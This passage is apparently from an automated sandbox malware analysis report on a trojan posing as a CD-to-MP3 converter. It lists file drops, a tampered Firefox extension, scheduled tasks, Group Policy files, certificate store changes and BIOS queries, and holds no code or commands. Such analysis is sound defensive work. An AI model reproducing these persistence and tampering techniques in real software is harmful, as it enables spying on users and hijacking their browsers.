File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C02877841121CC45139CB51404116B25_A71D3C9ACFD0888B19B4EAA86FAA4437 C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C02877841121CC45139CB51404116B25_DE59F8C40B88A0DF57DC57DBBEDD7057 C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\Bn9IWqvN\1YH22YflPi.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\Bn9IWqvN\1YH22YflPi.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_32201FF65E9A20A693462A3946A29CAE C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C02877841121CC45139CB51404116B25_DE59F8C40B88A0DF57DC57DBBEDD7057 C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
File created C:\Program Files (x86)\OJBbginKvssDnbEKbsR\izrRiZa.xml C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
File created C:\Program Files (x86)\hMiQKFvmPLjeC\SrrJrZQ.dll C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
File created C:\Program Files (x86)\AMqhlrBDqRJU2\odjVjmdAyNjvj.dll C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
File created C:\Program Files (x86)\AMqhlrBDqRJU2\FnlJVMA.xml C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
File created C:\Program Files (x86)\OJBbginKvssDnbEKbsR\ejpobva.dll C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
File created C:\Program Files (x86)\hMiQKFvmPLjeC\wpsSjdR.xml C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
File created C:\Program Files (x86)\UQtSSXvqU\SBIkhNc.xml C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
File created C:\Program Files (x86)\UQtSSXvqU\dVmANv.dll C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
File created C:\Program Files (x86)\ezMWJXFFLyUn\jHWamxc.dll C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\bEtnHIcecDUtXwQuWS.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\FPIEUdZLMYPzsiUNM.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\OcPshDNvhDnVmSv.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\MRTHivZIQsRdEanwm.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\Bn9IWqvN\1YH22YflPi.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\Bn9IWqvN\1YH22YflPi.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\Bn9IWqvN\1YH22YflPi.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\Bn9IWqvN\1YH22YflPi.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "6" C:\Users\Admin\AppData\Local\Temp\Bn9IWqvN\1YH22YflPi.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
